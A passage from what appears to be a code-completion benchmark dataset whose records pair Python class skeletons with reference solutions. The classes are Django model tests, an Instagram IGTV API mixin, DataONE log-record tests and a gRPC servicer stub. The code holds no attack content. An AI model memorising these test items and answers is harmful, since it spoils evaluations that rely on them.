caffe=self.caffe)\n product4 = Product.objects.create(name='product4', category=second_cat, unit=liter, caffe=self.caffe)\n FullProduct.objects.create(product=product1, amount=10, report=report1, caffe=self.caffe)\n FullProduct.objects.create(product=product2, amount=100, report=report2, caffe=self.caffe)\n FullProduct.objects.create(product=product3, amount=0, report=report3, caffe=self.caffe)\n FullProduct.objects.create(product=product4, amount=1000, report=report4, caffe=self.caffe)\n<|end_body_0|>\n\n<|body_start_1|>\n self.assertEqual(Report.objects.count(), 4)\n report = Report.objects.first()\n self.assertEqual(report.caffe, self.caffe)\n<|end_body_1|>\n\n<|body_start_2|>\n report1 = Report.objects.get(id=1)\n product = FullProduct.objects.first().product\n with self.assertRaises(Exception):\n FullProduct.objects.create(product=product, amount=1, report=report1)\n<|end_body_2|>\n\n<|body_start_3|>\n Report.objects.create(caffe=self.caffe, creator=self.user)\n with self.assertRaises(Exception):\n Report.objects.create(caffe=self.filtry, creator=self.user)\n<|end_body_3|>\n", "revision_id": "cdb7f5edb29255c7e874eaa6231621063210a8b0", "skeleton": "<|skeleton|>\nclass ReportModelTest:\n \"\"\"Report tests.\"\"\"\n\n def setUp(self):\n \"\"\"Data setup for tests.\"\"\"\n <|body_0|>\n\n def test_create(self):\n \"\"\"Check creating reports.\"\"\"\n <|body_1|>\n\n def test_doubles(self):\n \"\"\"Check if two fullproducts with same product are not allowed.\"\"\"\n <|body_2|>\n\n def test_report_validation(self):\n \"\"\"Check if Report model is properly 
validated.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ReportModelTest:\n \"\"\"Report tests.\"\"\"\n\n def setUp(self):\n \"\"\"Data setup for tests.\"\"\"\n self.caffe = Caffe.objects.create(name='kafo', city='Gliwice', street='Wieczorka', house_number='14', postal_code='44-100')\n self.filtry = Caffe.objects.create(name='filtry', city='Warszawa', street='Filry', house_number='14', postal_code='44-100')\n self.user = Employee.objects.create_user(username='admin', password='admin', caffe=self.caffe)\n report1 = Report.objects.create(caffe=self.caffe)\n report2 = Report.objects.create(caffe=self.caffe)\n report3 = Report.objects.create(caffe=self.caffe)\n report4 = Report.objects.create(caffe=self.caffe)\n first_cat = Category.objects.create(name='first', caffe=self.caffe)\n second_cat = Category.objects.create(name='second', caffe=self.caffe)\n gram = Unit.objects.create(name='gram', caffe=self.caffe)\n liter = Unit.objects.create(name='liter', caffe=self.caffe)\n product1 = Product.objects.create(name='product1', category=first_cat, unit=gram, caffe=self.caffe)\n product2 = Product.objects.create(name='product2', category=first_cat, unit=liter, caffe=self.caffe)\n product3 = Product.objects.create(name='product3', category=second_cat, unit=gram, caffe=self.caffe)\n product4 = Product.objects.create(name='product4', category=second_cat, unit=liter, caffe=self.caffe)\n FullProduct.objects.create(product=product1, amount=10, report=report1, caffe=self.caffe)\n FullProduct.objects.create(product=product2, amount=100, report=report2, caffe=self.caffe)\n FullProduct.objects.create(product=product3, amount=0, report=report3, caffe=self.caffe)\n FullProduct.objects.create(product=product4, amount=1000, report=report4, caffe=self.caffe)\n\n def test_create(self):\n \"\"\"Check creating reports.\"\"\"\n self.assertEqual(Report.objects.count(), 4)\n report = Report.objects.first()\n self.assertEqual(report.caffe, self.caffe)\n\n def test_doubles(self):\n \"\"\"Check if two fullproducts with same product are not allowed.\"\"\"\n report1 = Report.objects.get(id=1)\n product = FullProduct.objects.first().product\n with self.assertRaises(Exception):\n FullProduct.objects.create(product=product, amount=1, report=report1)\n\n def test_report_validation(self):\n \"\"\"Check if Report model is properly validated.\"\"\"\n Report.objects.create(caffe=self.caffe, creator=self.user)\n with self.assertRaises(Exception):\n Report.objects.create(caffe=self.filtry, creator=self.user)\n", "source": "the_stack_v2_python_sparse", "source_path": "caffe/reports/test_models.py", "source_repo": "VirrageS/io-kawiarnie", "split": "test", "star_events_count": 3} {"blob_id": "ad4410bc547c6d96397c6b2ba724c9e107ca6759", "bodies": ["if channel_id not in ('for_you', 'chrono_following', 'popular', 'continue_watching') and (not re.match(USER_CHANNEL_ID_RE, channel_id)):\n raise ValueError('Invalid channel_id: {}'.format(channel_id))\nendpoint = 'igtv/channel/'\nparams = {'id': channel_id}\nparams.update(self.authenticated_params)\nif kwargs:\n params.update(kwargs)\nres = self._call_api(endpoint, params=params)\nif self.auto_patch:\n [ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys) for m in res.get('items', [])]\nreturn res", "res = self._call_api('igtv/tv_guide/')\nif self.auto_patch:\n for c in res.get('channels', []):\n [ClientCompatPatch.media(m, 
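The test_doubles body above relies on a database constraint: creating a second FullProduct with the same product in the same report must raise. Below is a plain-unittest sketch of that assertRaises pattern with Django removed; the in-memory set standing in for the unique constraint is an assumption.

import unittest

class UniquePerReportTest(unittest.TestCase):
    def setUp(self):
        self.store = set()  # stands in for the DB unique constraint

    def create_full_product(self, report_id, product_id):
        key = (report_id, product_id)
        if key in self.store:
            raise ValueError("duplicate product in report")
        self.store.add(key)

    def test_doubles(self):
        self.create_full_product(report_id=1, product_id=1)
        with self.assertRaises(Exception):  # same shape as the record's check
            self.create_full_product(report_id=1, product_id=1)

unittest.main(argv=["prog"], exit=False)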
drop_incompat_keys=self.drop_incompat_keys) for m in c.get('items', [])]\n [ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys) for m in res.get('my_channel', {}).get('items', [])]\nreturn res", "text = text.strip()\nif not text.strip():\n raise ValueError('Search text cannot be empty')\nres = self._call_api('igtv/search/', query={'query': text})\nif self.auto_patch:\n for r in res.get('results', []):\n [ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys) for m in r.get('channel', {}).get('items', [])]\n if r.get('user'):\n ClientCompatPatch.user(r['user'], drop_incompat_keys=self.drop_incompat_keys)\nreturn res"], "bodies_text": "<|body_start_0|>\n if channel_id not in ('for_you', 'chrono_following', 'popular', 'continue_watching') and (not re.match(USER_CHANNEL_ID_RE, channel_id)):\n raise ValueError('Invalid channel_id: {}'.format(channel_id))\n endpoint = 'igtv/channel/'\n params = {'id': channel_id}\n params.update(self.authenticated_params)\n if kwargs:\n params.update(kwargs)\n res = self._call_api(endpoint, params=params)\n if self.auto_patch:\n [ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys) for m in res.get('items', [])]\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n res = self._call_api('igtv/tv_guide/')\n if self.auto_patch:\n for c in res.get('channels', []):\n [ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys) for m in c.get('items', [])]\n [ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys) for m in res.get('my_channel', {}).get('items', [])]\n return res\n<|end_body_1|>\n\n<|body_start_2|>\n text = text.strip()\n if not text.strip():\n raise ValueError('Search text cannot be empty')\n res = self._call_api('igtv/search/', query={'query': text})\n if self.auto_patch:\n for r in res.get('results', []):\n [ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys) for m in r.get('channel', {}).get('items', [])]\n if r.get('user'):\n ClientCompatPatch.user(r['user'], drop_incompat_keys=self.drop_incompat_keys)\n return res\n<|end_body_2|>\n", "class_docstring": "For endpoints in ``/igtv/``.", "class_name": "IGTVEndpointsMixin", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass IGTVEndpointsMixin:\n \"\"\"For endpoints in ``/igtv/``.\"\"\"\n\n def tvchannel(self, channel_id, **kwargs):\n \"\"\"Get channel :param channel_id: One of 'for_you', 'chrono_following', 'popular', 'continue_watching' (as returned by :meth:`tvguide`) or for a user 'user_12345' where user_id = '12345'\"\"\"\n <|body_0|>\n\n def tvguide(self):\n \"\"\"TV guide to popular, following, suggested channels, etc\"\"\"\n <|body_1|>\n\n def search_igtv(self, text):\n \"\"\"Search igtv :param text: Search term\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if channel_id not in ('for_you', 'chrono_following', 'popular', 'continue_watching') and (not re.match(USER_CHANNEL_ID_RE, channel_id)):\n raise ValueError('Invalid channel_id: {}'.format(channel_id))\n endpoint = 'igtv/channel/'\n params = {'id': channel_id}\n params.update(self.authenticated_params)\n if kwargs:\n params.update(kwargs)\n res = self._call_api(endpoint, params=params)\n if self.auto_patch:\n [ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys) for m in res.get('items', [])]\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n res = self._call_api('igtv/tv_guide/')\n if self.auto_patch:\n for c in res.get('channels', []):\n 
[ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys) for m in c.get('items', [])]\n [ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys) for m in res.get('my_channel', {}).get('items', [])]\n return res\n<|end_body_1|>\n\n<|body_start_2|>\n text = text.strip()\n if not text.strip():\n raise ValueError('Search text cannot be empty')\n res = self._call_api('igtv/search/', query={'query': text})\n if self.auto_patch:\n for r in res.get('results', []):\n [ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys) for m in r.get('channel', {}).get('items', [])]\n if r.get('user'):\n ClientCompatPatch.user(r['user'], drop_incompat_keys=self.drop_incompat_keys)\n return res\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000383", "length_bytes": 2289, "license_type": "permissive", "methods": [{"docstring": "Get channel :param channel_id: One of 'for_you', 'chrono_following', 'popular', 'continue_watching' (as returned by :meth:`tvguide`) or for a user 'user_12345' where user_id = '12345'", "name": "tvchannel", "signature": "def tvchannel(self, channel_id, **kwargs)"}, {"docstring": "TV guide to popular, following, suggested channels, etc", "name": "tvguide", "signature": "def tvguide(self)"}, {"docstring": "Search igtv :param text: Search term", "name": "search_igtv", "signature": "def search_igtv(self, text)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_001388", "prompt": "Implement the Python class `IGTVEndpointsMixin` described below.\n\nClass description:\nFor endpoints in ``/igtv/``.\n\nMethod signatures and docstrings:\n- def tvchannel(self, channel_id, **kwargs): Get channel :param channel_id: One of 'for_you', 'chrono_following', 'popular', 'continue_watching' (as returned by :meth:`tvguide`) or for a user 'user_12345' where user_id = '12345'\n- def tvguide(self): TV guide to popular, following, suggested channels, etc\n- def search_igtv(self, text): Search igtv :param text: Search term", "prompted_full_text": "Implement the Python class `IGTVEndpointsMixin` described below.\n\nClass description:\nFor endpoints in ``/igtv/``.\n\nMethod signatures and docstrings:\n- def tvchannel(self, channel_id, **kwargs): Get channel :param channel_id: One of 'for_you', 'chrono_following', 'popular', 'continue_watching' (as returned by :meth:`tvguide`) or for a user 'user_12345' where user_id = '12345'\n- def tvguide(self): TV guide to popular, following, suggested channels, etc\n- def search_igtv(self, text): Search igtv :param text: Search term\n\n<|skeleton|>\nclass IGTVEndpointsMixin:\n \"\"\"For endpoints in ``/igtv/``.\"\"\"\n\n def tvchannel(self, channel_id, **kwargs):\n \"\"\"Get channel :param channel_id: One of 'for_you', 'chrono_following', 'popular', 'continue_watching' (as returned by :meth:`tvguide`) or for a user 'user_12345' where user_id = '12345'\"\"\"\n <|body_0|>\n\n def tvguide(self):\n \"\"\"TV guide to popular, following, suggested channels, etc\"\"\"\n <|body_1|>\n\n def search_igtv(self, text):\n \"\"\"Search igtv :param text: Search term\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if channel_id not in ('for_you', 'chrono_following', 'popular', 'continue_watching') and (not re.match(USER_CHANNEL_ID_RE, channel_id)):\n raise ValueError('Invalid channel_id: {}'.format(channel_id))\n endpoint = 'igtv/channel/'\n params = {'id': channel_id}\n params.update(self.authenticated_params)\n if kwargs:\n params.update(kwargs)\n res = self._call_api(endpoint, params=params)\n if 
self.auto_patch:\n [ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys) for m in res.get('items', [])]\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n res = self._call_api('igtv/tv_guide/')\n if self.auto_patch:\n for c in res.get('channels', []):\n [ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys) for m in c.get('items', [])]\n [ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys) for m in res.get('my_channel', {}).get('items', [])]\n return res\n<|end_body_1|>\n\n<|body_start_2|>\n text = text.strip()\n if not text.strip():\n raise ValueError('Search text cannot be empty')\n res = self._call_api('igtv/search/', query={'query': text})\n if self.auto_patch:\n for r in res.get('results', []):\n [ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys) for m in r.get('channel', {}).get('items', [])]\n if r.get('user'):\n ClientCompatPatch.user(r['user'], drop_incompat_keys=self.drop_incompat_keys)\n return res\n<|end_body_2|>\n", "revision_id": "7474bf00d2e97c73630713f3f0cec20a1b56b021", "skeleton": "<|skeleton|>\nclass IGTVEndpointsMixin:\n \"\"\"For endpoints in ``/igtv/``.\"\"\"\n\n def tvchannel(self, channel_id, **kwargs):\n \"\"\"Get channel :param channel_id: One of 'for_you', 'chrono_following', 'popular', 'continue_watching' (as returned by :meth:`tvguide`) or for a user 'user_12345' where user_id = '12345'\"\"\"\n <|body_0|>\n\n def tvguide(self):\n \"\"\"TV guide to popular, following, suggested channels, etc\"\"\"\n <|body_1|>\n\n def search_igtv(self, text):\n \"\"\"Search igtv :param text: Search term\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class IGTVEndpointsMixin:\n \"\"\"For endpoints in ``/igtv/``.\"\"\"\n\n def tvchannel(self, channel_id, **kwargs):\n \"\"\"Get channel :param channel_id: One of 'for_you', 'chrono_following', 'popular', 'continue_watching' (as returned by :meth:`tvguide`) or for a user 'user_12345' where user_id = '12345'\"\"\"\n if channel_id not in ('for_you', 'chrono_following', 'popular', 'continue_watching') and (not re.match(USER_CHANNEL_ID_RE, channel_id)):\n raise ValueError('Invalid channel_id: {}'.format(channel_id))\n endpoint = 'igtv/channel/'\n params = {'id': channel_id}\n params.update(self.authenticated_params)\n if kwargs:\n params.update(kwargs)\n res = self._call_api(endpoint, params=params)\n if self.auto_patch:\n [ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys) for m in res.get('items', [])]\n return res\n\n def tvguide(self):\n \"\"\"TV guide to popular, following, suggested channels, etc\"\"\"\n res = self._call_api('igtv/tv_guide/')\n if self.auto_patch:\n for c in res.get('channels', []):\n [ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys) for m in c.get('items', [])]\n [ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys) for m in res.get('my_channel', {}).get('items', [])]\n return res\n\n def search_igtv(self, text):\n \"\"\"Search igtv :param text: Search term\"\"\"\n text = text.strip()\n if not text.strip():\n raise ValueError('Search text cannot be empty')\n res = self._call_api('igtv/search/', query={'query': text})\n if self.auto_patch:\n for r in res.get('results', []):\n [ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys) for m in r.get('channel', {}).get('items', [])]\n if r.get('user'):\n ClientCompatPatch.user(r['user'], 
drop_incompat_keys=self.drop_incompat_keys)\n return res\n", "source": "the_stack_v2_python_sparse", "source_path": "instabotnet/api/instagram_private_api/endpoints/igtv.py", "source_repo": "remorses/instagram-botnet", "split": "test", "star_events_count": 7} {"blob_id": "4e7359131ee5b830ecc832ac28de4bbb34d8e130", "bodies": ["client = test_client.TestClient(context.node['baseurl'])\nlog_records = client.getLogRecords(context.TOKEN, datetime.datetime(1800, 1, 1), event='create')\nassert log_records.total == context.object_total", "client = test_client.TestClient(context.node['baseurl'])\nlog_records = client.getLogRecords(context.TOKEN, datetime.datetime(1800, 1, 1))\ncontext.log_records_total = log_records.total", "dates = []\nfor object_list in context.slices:\n for object_info in object_list.objectInfo:\n dates.append(object_info.dateSysMetadataModified)\nclient = test_client.TestClient(context.node['baseurl'])\nlogRecords = client.getLogRecords('', datetime.datetime(1800, 1, 1))\nassert len(logRecords.logEntry) == EVENTS_TOTAL\nfound = False\nfor o in logRecords.logEntry:\n if o.identifier.value() == 'hdl:10255/dryad.654/mets.xml' and o.event == 'create':\n found = True\n break\nassert found"], "bodies_text": "<|body_start_0|>\n client = test_client.TestClient(context.node['baseurl'])\n log_records = client.getLogRecords(context.TOKEN, datetime.datetime(1800, 1, 1), event='create')\n assert log_records.total == context.object_total\n<|end_body_0|>\n\n<|body_start_1|>\n client = test_client.TestClient(context.node['baseurl'])\n log_records = client.getLogRecords(context.TOKEN, datetime.datetime(1800, 1, 1))\n context.log_records_total = log_records.total\n<|end_body_1|>\n\n<|body_start_2|>\n dates = []\n for object_list in context.slices:\n for object_info in object_list.objectInfo:\n dates.append(object_info.dateSysMetadataModified)\n client = test_client.TestClient(context.node['baseurl'])\n logRecords = client.getLogRecords('', datetime.datetime(1800, 1, 1))\n assert len(logRecords.logEntry) == EVENTS_TOTAL\n found = False\n for o in logRecords.logEntry:\n if o.identifier.value() == 'hdl:10255/dryad.654/mets.xml' and o.event == 'create':\n found = True\n break\n assert found\n<|end_body_2|>\n", "class_docstring": "", "class_name": "Test040GetLogRecords", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Test040GetLogRecords:\n\n def test_010_create_events(self):\n \"\"\"Event log contains the correct number of create events.\"\"\"\n <|body_0|>\n\n def test_020_get_total_events(self):\n \"\"\"Get total number of events.\"\"\"\n <|body_1|>\n\n def xevent_log_contains_create_events(self):\n \"\"\"Event log contains create events for all objects that are currently known. 
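tvchannel() in the IGTV record gates channel_id on a whitelist or the USER_CHANNEL_ID_RE regex, whose body is not included in the record. A sketch of that validation with an assumed pattern ("user_" followed by digits, matching the 'user_12345' example in the docstring):

import re

# The regex body is not in the record; "user_" + digits is an assumed
# pattern consistent with the docstring's 'user_12345' example.
USER_CHANNEL_ID_RE = r"^user_\d+$"
KNOWN_CHANNELS = ("for_you", "chrono_following", "popular", "continue_watching")

def validate_channel_id(channel_id):
    if channel_id not in KNOWN_CHANNELS and not re.match(USER_CHANNEL_ID_RE, channel_id):
        raise ValueError("Invalid channel_id: {}".format(channel_id))
    return channel_id

print(validate_channel_id("user_12345"))
print(validate_channel_id("popular"))
try:
    validate_channel_id("bogus")
except ValueError as exc:
    print(exc)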
Timestamp slicing includes the correct object.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n client = test_client.TestClient(context.node['baseurl'])\n log_records = client.getLogRecords(context.TOKEN, datetime.datetime(1800, 1, 1), event='create')\n assert log_records.total == context.object_total\n<|end_body_0|>\n\n<|body_start_1|>\n client = test_client.TestClient(context.node['baseurl'])\n log_records = client.getLogRecords(context.TOKEN, datetime.datetime(1800, 1, 1))\n context.log_records_total = log_records.total\n<|end_body_1|>\n\n<|body_start_2|>\n dates = []\n for object_list in context.slices:\n for object_info in object_list.objectInfo:\n dates.append(object_info.dateSysMetadataModified)\n client = test_client.TestClient(context.node['baseurl'])\n logRecords = client.getLogRecords('', datetime.datetime(1800, 1, 1))\n assert len(logRecords.logEntry) == EVENTS_TOTAL\n found = False\n for o in logRecords.logEntry:\n if o.identifier.value() == 'hdl:10255/dryad.654/mets.xml' and o.event == 'create':\n found = True\n break\n assert found\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000384", "length_bytes": 2896, "license_type": "permissive", "methods": [{"docstring": "Event log contains the correct number of create events.", "name": "test_010_create_events", "signature": "def test_010_create_events(self)"}, {"docstring": "Get total number of events.", "name": "test_020_get_total_events", "signature": "def test_020_get_total_events(self)"}, {"docstring": "Event log contains create events for all objects that are currently known. Timestamp slicing includes the correct object.", "name": "xevent_log_contains_create_events", "signature": "def xevent_log_contains_create_events(self)"}], "n_methods": 3, "prompt": "Implement the Python class `Test040GetLogRecords` described below.\n\nClass description:\nImplement the Test040GetLogRecords class.\n\nMethod signatures and docstrings:\n- def test_010_create_events(self): Event log contains the correct number of create events.\n- def test_020_get_total_events(self): Get total number of events.\n- def xevent_log_contains_create_events(self): Event log contains create events for all objects that are currently known. Timestamp slicing includes the correct object.", "prompted_full_text": "Implement the Python class `Test040GetLogRecords` described below.\n\nClass description:\nImplement the Test040GetLogRecords class.\n\nMethod signatures and docstrings:\n- def test_010_create_events(self): Event log contains the correct number of create events.\n- def test_020_get_total_events(self): Get total number of events.\n- def xevent_log_contains_create_events(self): Event log contains create events for all objects that are currently known. Timestamp slicing includes the correct object.\n\n<|skeleton|>\nclass Test040GetLogRecords:\n\n def test_010_create_events(self):\n \"\"\"Event log contains the correct number of create events.\"\"\"\n <|body_0|>\n\n def test_020_get_total_events(self):\n \"\"\"Get total number of events.\"\"\"\n <|body_1|>\n\n def xevent_log_contains_create_events(self):\n \"\"\"Event log contains create events for all objects that are currently known. 
Timestamp slicing includes the correct object.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n client = test_client.TestClient(context.node['baseurl'])\n log_records = client.getLogRecords(context.TOKEN, datetime.datetime(1800, 1, 1), event='create')\n assert log_records.total == context.object_total\n<|end_body_0|>\n\n<|body_start_1|>\n client = test_client.TestClient(context.node['baseurl'])\n log_records = client.getLogRecords(context.TOKEN, datetime.datetime(1800, 1, 1))\n context.log_records_total = log_records.total\n<|end_body_1|>\n\n<|body_start_2|>\n dates = []\n for object_list in context.slices:\n for object_info in object_list.objectInfo:\n dates.append(object_info.dateSysMetadataModified)\n client = test_client.TestClient(context.node['baseurl'])\n logRecords = client.getLogRecords('', datetime.datetime(1800, 1, 1))\n assert len(logRecords.logEntry) == EVENTS_TOTAL\n found = False\n for o in logRecords.logEntry:\n if o.identifier.value() == 'hdl:10255/dryad.654/mets.xml' and o.event == 'create':\n found = True\n break\n assert found\n<|end_body_2|>\n", "revision_id": "d72a9461894d9be7d71178fb7310101b8ef9066a", "skeleton": "<|skeleton|>\nclass Test040GetLogRecords:\n\n def test_010_create_events(self):\n \"\"\"Event log contains the correct number of create events.\"\"\"\n <|body_0|>\n\n def test_020_get_total_events(self):\n \"\"\"Get total number of events.\"\"\"\n <|body_1|>\n\n def xevent_log_contains_create_events(self):\n \"\"\"Event log contains create events for all objects that are currently known. Timestamp slicing includes the correct object.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Test040GetLogRecords:\n def test_010_create_events(self):\n \"\"\"Event log contains the correct number of create events.\"\"\"\n client = test_client.TestClient(context.node['baseurl'])\n log_records = client.getLogRecords(context.TOKEN, datetime.datetime(1800, 1, 1), event='create')\n assert log_records.total == context.object_total\n\n def test_020_get_total_events(self):\n \"\"\"Get total number of events.\"\"\"\n client = test_client.TestClient(context.node['baseurl'])\n log_records = client.getLogRecords(context.TOKEN, datetime.datetime(1800, 1, 1))\n context.log_records_total = log_records.total\n\n def xevent_log_contains_create_events(self):\n \"\"\"Event log contains create events for all objects that are currently known. 
Timestamp slicing includes the correct object.\"\"\"\n dates = []\n for object_list in context.slices:\n for object_info in object_list.objectInfo:\n dates.append(object_info.dateSysMetadataModified)\n client = test_client.TestClient(context.node['baseurl'])\n logRecords = client.getLogRecords('', datetime.datetime(1800, 1, 1))\n assert len(logRecords.logEntry) == EVENTS_TOTAL\n found = False\n for o in logRecords.logEntry:\n if o.identifier.value() == 'hdl:10255/dryad.654/mets.xml' and o.event == 'create':\n found = True\n break\n assert found\n", "source": "the_stack_v2_python_sparse", "source_path": "test_utilities/src/d1_test/stress_tester/projects/_unit_test_bases_for_stress_tests/tier_1_mn_core_getlogrecords.py", "source_repo": "DataONEorg/d1_python", "split": "test", "star_events_count": 15} {"blob_id": "21bc04b65f9d76d593083e051f39dbbafd8eefee", "bodies": ["context.set_code(grpc.StatusCode.UNIMPLEMENTED)\ncontext.set_details('Method not implemented!')\nraise NotImplementedError('Method not implemented!')", "context.set_code(grpc.StatusCode.UNIMPLEMENTED)\ncontext.set_details('Method not implemented!')\nraise NotImplementedError('Method not implemented!')", "context.set_code(grpc.StatusCode.UNIMPLEMENTED)\ncontext.set_details('Method not implemented!')\nraise NotImplementedError('Method not implemented!')", "context.set_code(grpc.StatusCode.UNIMPLEMENTED)\ncontext.set_details('Method not implemented!')\nraise NotImplementedError('Method not implemented!')"], "bodies_text": "<|body_start_0|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_0|>\n\n<|body_start_1|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_1|>\n\n<|body_start_2|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_2|>\n\n<|body_start_3|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_3|>\n", "class_docstring": "Missing associated documentation comment in .proto file.", "class_name": "AgentProfileServiceServicer", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AgentProfileServiceServicer:\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n\n def createAgent(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n <|body_0|>\n\n def updateAgent(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n <|body_1|>\n\n def deleteAgent(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n <|body_2|>\n\n def getAgent(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_0|>\n\n<|body_start_1|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_1|>\n\n<|body_start_2|>\n 
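The Test040GetLogRecords bodies call getLogRecords(token, fromDate, event='create') and compare totals. A toy sketch of that date-plus-event filtering follows; the in-memory log and the entry shape are assumptions, not the DataONE test client API.

import datetime

# In-memory log entries; shape and contents are illustrative assumptions.
LOG = [
    {"event": "create", "date": datetime.datetime(2020, 1, 1), "pid": "obj1"},
    {"event": "read",   "date": datetime.datetime(2021, 6, 1), "pid": "obj1"},
    {"event": "create", "date": datetime.datetime(2022, 3, 5), "pid": "obj2"},
]

def get_log_records(from_date, event=None):
    return [e for e in LOG
            if e["date"] >= from_date and (event is None or e["event"] == event)]

creates = get_log_records(datetime.datetime(1800, 1, 1), event="create")
assert len(creates) == 2                                          # create-event count
assert len(get_log_records(datetime.datetime(1800, 1, 1))) == 3   # total events
print("ok")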
context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_2|>\n\n<|body_start_3|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000385", "length_bytes": 8348, "license_type": "permissive", "methods": [{"docstring": "Missing associated documentation comment in .proto file.", "name": "createAgent", "signature": "def createAgent(self, request, context)"}, {"docstring": "Missing associated documentation comment in .proto file.", "name": "updateAgent", "signature": "def updateAgent(self, request, context)"}, {"docstring": "Missing associated documentation comment in .proto file.", "name": "deleteAgent", "signature": "def deleteAgent(self, request, context)"}, {"docstring": "Missing associated documentation comment in .proto file.", "name": "getAgent", "signature": "def getAgent(self, request, context)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_002112", "prompt": "Implement the Python class `AgentProfileServiceServicer` described below.\n\nClass description:\nMissing associated documentation comment in .proto file.\n\nMethod signatures and docstrings:\n- def createAgent(self, request, context): Missing associated documentation comment in .proto file.\n- def updateAgent(self, request, context): Missing associated documentation comment in .proto file.\n- def deleteAgent(self, request, context): Missing associated documentation comment in .proto file.\n- def getAgent(self, request, context): Missing associated documentation comment in .proto file.", "prompted_full_text": "Implement the Python class `AgentProfileServiceServicer` described below.\n\nClass description:\nMissing associated documentation comment in .proto file.\n\nMethod signatures and docstrings:\n- def createAgent(self, request, context): Missing associated documentation comment in .proto file.\n- def updateAgent(self, request, context): Missing associated documentation comment in .proto file.\n- def deleteAgent(self, request, context): Missing associated documentation comment in .proto file.\n- def getAgent(self, request, context): Missing associated documentation comment in .proto file.\n\n<|skeleton|>\nclass AgentProfileServiceServicer:\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n\n def createAgent(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n <|body_0|>\n\n def updateAgent(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n <|body_1|>\n\n def deleteAgent(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n <|body_2|>\n\n def getAgent(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_0|>\n\n<|body_start_1|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not 